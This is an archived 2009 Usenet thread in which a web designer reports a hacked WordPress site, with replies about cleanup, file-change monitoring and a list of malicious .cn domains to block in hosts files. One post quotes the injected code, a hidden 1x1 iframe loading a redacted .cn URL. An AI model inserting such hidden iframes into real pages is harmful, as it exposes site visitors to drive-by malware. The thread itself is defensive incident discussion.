wordpress virus!
The wordpress site I designed has been running fine for 7 weeks, then at the
weekend I got a phone call telling me both the home and log-in pages were
out of order with errors;
Every index.php of all directories has been corrupted with </html> which is
already set in the footer php, the source codes are sprayed with characters
showing only as squares and has had an iframe added to it holding a URL with
a .cn suffix.
When I took one of these from the server Avast recognised the iframe as a
'virus/worm'. Would I be right to think that these squares displayed in the
source code are Chinese characters along with a dodgy iframe generated by a
virus?
-dE|_---
date: Thu, 26 Feb 2009 02:37:29 -0000
author: dE|_
|
Re: wordpress virus!
dE|_ wrote:
> When I took one of these from the server Avast recognised the iframe as a
> 'virus/worm'. Would I be right to think that these squares displayed in the
> source code are Chinese characters along with a dodgy iframe generated by a
> virus?
Your site has been compromised and hacked. It's now trying to hijack
the browsers of anyone who visits the site and infect their PC's. You
need to work out if they broken in via your site and how much damage
they caused to other stuff, or if they broke in via your hosting company
and likewise, how much they've hijacked.
If they broke in via your site, it's likely to be an insecure plugin.
--
Tony Evans
Saving trees and wasting electrons since 1993
blog -> http://perceptionistruth.com/
olmr -> http://www.onelinemoviereviews.co.uk/
[ anything below this line wasn't written by me ]
date: Thu, 26 Feb 2009 20:06:09 +0000
author: Tony
|
Re: wordpress virus!
"Tony" wrote in message
news:49a6f632$0$511$bed64819@news.gradwell.net...
> dE|_ wrote:
>
>> When I took one of these from the server Avast recognised the iframe as a
>> 'virus/worm'. Would I be right to think that these squares displayed in
>> the source code are Chinese characters along with a dodgy iframe
>> generated by a virus?
>
> Your site has been compromised and hacked. It's now trying to hijack the
> browsers of anyone who visits the site and infect their PC's. You need to
> work out if they broken in via your site and how much damage they caused
> to other stuff, or if they broke in via your hosting company and likewise,
> how much they've hijacked.
>
> If they broke in via your site, it's likely to be an insecure plugin.
Well it's been making the same attacks at my client's second domain which is
in a seperate sub directory and not a wordpress site. Good job.
It turns out that the square characterers were just caridge returns not
recognised by basic Notepad, but for any potential interest this is the
hacker's frame injection to the php tag (domain crossed out);
<?php get_footer(); ?<html><body><iframe
src="http://XXXXXX.cn/in.cgi?cocacola73" width=1 height=1 style="visibility:
hidden"></iframe></body></html>>
-dE|_---
date: Thu, 26 Feb 2009 21:16:14 -0000
author: dE|_
|
Re: wordpress virus!
dE|_ wrote:
> Well it's been making the same attacks at my client's second domain which is
> in a seperate sub directory and not a wordpress site. Good job.
I don't know what kind of hosting you have so it may not be appropriate,
but I run a cron job every night to report on all changed files on all
the sites I host.
I have to filter out some directories which change a lot (like caches),
and if I do an upgrade it's obviously going to report a lot of changes,
but it's invaluable at spotting code which has been changed by something
other than me.
--
Tony Evans
Saving trees and wasting electrons since 1993
blog -> http://perceptionistruth.com/
olmr -> http://www.onelinemoviereviews.co.uk/
[ anything below this line wasn't written by me ]
date: Thu, 26 Feb 2009 21:27:19 +0000
author: Tony
|
Re: wordpress virus!
"dE|_" wrote in message
news:vEDpl.24735$183.21783@newsfe09.ams2...
:
: "Tony" wrote in message
: news:49a6f632$0$511$bed64819@news.gradwell.net...
: > dE|_ wrote:
: >
: >> When I took one of these from the server Avast recognised
the iframe as a
: >> 'virus/worm'. Would I be right to think that these squares
displayed in
: >> the source code are Chinese characters along with a dodgy
iframe
: >> generated by a virus?
: >
: > Your site has been compromised and hacked. It's now trying
to hijack the
: > browsers of anyone who visits the site and infect their PC's.
You need to
: > work out if they broken in via your site and how much damage
they caused
: > to other stuff, or if they broke in via your hosting company
and likewise,
: > how much they've hijacked.
: >
: > If they broke in via your site, it's likely to be an insecure
plugin.
:
: Well it's been making the same attacks at my client's second
domain which is
: in a seperate sub directory and not a wordpress site. Good job.
:
: It turns out that the square characterers were just caridge
returns not
: recognised by basic Notepad, but for any potential interest
this is the
: hacker's frame injection to the php tag (domain crossed out);
:
: <?php get_footer(); ?<html><body><iframe
: src="http://XXXXXX.cn/in.cgi?cocacola73" width=1 height=1
style="visibility:
: hidden"></iframe></body></html>>
:
Not joking, but can you fill in the blanks (just give us the
missing content so we can reconstruct the above domain) so that
those of us who configure / check entries in our Window 'hosts'
file(s) etc. can check that the above domain does indeed have a
look-up loop-back to 127.0.0.1 (localhost). Hopefully Spybot etc.
will have it covered already but one never knows...
--
Wikipedia: the Internet equivalent of
Hyde Park and 'speakers corner'...
Sorry, mail to this address goes unread.
Please reply via group.
date: Thu, 26 Feb 2009 21:35:06 -0000
author: Jerry LID
|
Re: wordpress virus!
Jerry wrote:
> Not joking, but can you fill in the blanks (just give us the
> missing content so we can reconstruct the above domain) so that
> those of us who configure / check entries in our Window 'hosts'
> file(s) etc. can check that the above domain does indeed have a
> look-up loop-back to 127.0.0.1 (localhost). Hopefully Spybot etc.
> will have it covered already but one never knows...
betstarwager dot cn
bestlotron dot cn
litetopfindworld dot cn
nickdick dot cn
my favourite
google dot analizer dot cn
top-name dot cn
diettopseek dot cn
--
Tony Evans
Saving trees and wasting electrons since 1993
blog -> http://perceptionistruth.com/
olmr -> http://www.onelinemoviereviews.co.uk/
[ anything below this line wasn't written by me ]
date: Thu, 26 Feb 2009 21:59:19 +0000
author: Tony
|
Re: wordpress virus!
"Tony" wrote in message
news:49a710b8$0$510$bed64819@news.gradwell.net...
<snipped>
Cheers for that.
date: Thu, 26 Feb 2009 22:20:19 -0000
author: Jerry LID
|
Re: wordpress virus!
"Tony" wrote in message
news:49a710b8$0$510$bed64819@news.gradwell.net...
> Jerry wrote:
>
>> Not joking, but can you fill in the blanks (just give us the missing
>> content so we can reconstruct the above domain) so that those of us who
>> configure / check entries in our Window 'hosts' file(s) etc. can check
>> that the above domain does indeed have a look-up loop-back to 127.0.0.1
>> (localhost). Hopefully Spybot etc. will have it covered already but one
>> never knows...
>
>
> betstarwager dot cn
> bestlotron dot cn
> litetopfindworld dot cn
> nickdick dot cn
>
> my favourite
>
> google dot analizer dot cn
>
> top-name dot cn
> diettopseek dot cn
betstarwager
date: Thu, 26 Feb 2009 23:06:11 -0000
author: dE|_
|
Re: wordpress virus!
"Jerry" asked...
> : when dE|_ wrote...
> : <?php get_footer(); ?<html><body><iframe
> : src="http://XXXXXX.cn/in.cgi?cocacola73" width=1 height=1
> style="visibility:
> : hidden"></iframe></body></html>>
> :
>
> Not joking, but can you fill in the blanks (just give us the
> missing content so we can reconstruct the above domain) so that
> those of us who configure / check entries in our Window 'hosts'
> file(s) etc. can check that the above domain does indeed have a
> look-up loop-back to 127.0.0.1 (localhost). Hopefully Spybot etc.
> will have it covered already but one never knows...
DO NOT VISIT, THIS SITE MAY BE HARMFUL
---------------------------------------------------------
tp://betstarwager.cn/
---------------------------------------------------------
Searches on google looked ugly, had cocacola in the URL and had warning
signs all over the place.
-dE|_---
date: Fri, 27 Feb 2009 11:44:13 -0000
author: dE|_
|
Re: wordpress virus!
"dE|_" wrote in message
news:dmQpl.63286$WX2.615@newsfe23.ams2...
:
<snip>
:
: DO NOT VISIT, THIS SITE MAY BE HARMFUL
: ---------------------------------------------------------
<snipped> betstarwager.cn/
: ---------------------------------------------------------
:
: Searches on google looked ugly, had cocacola in the URL and had
warning
: signs all over the place.
:
That is EXACTLY why I want to create a look-up loop-back to my
own 127.0.0.1 (localhost) 'server'!
--
Wikipedia: the Internet equivalent of
Hyde Park and 'speakers corner'...
Sorry, mail to this address goes unread.
Please reply via group.
date: Fri, 27 Feb 2009 15:08:17 -0000
author: Jerry LID
|
Re: wordpress virus!
and does anyone knows the solution of this problem? so if i delete all ftp
clients saved sessions (for ex. total commanders ctrl+f), the
virus/malware/etc can not log in to the site root and modify the index files?
its not too good, if this "thing" can go in to the ftp side of the homepages.
..
btw i write php sites with function print_top_html() and print_down_html so
if the thing modifies the index file then the homepage comes unreachable...
its not so fine to modify the files twice within 1 day...
thanks!
url:http://myreader.co.uk/msg/12604864.aspx
date: Mon, 29 Jun 2009 23:53:15 +0800
author: rigo
|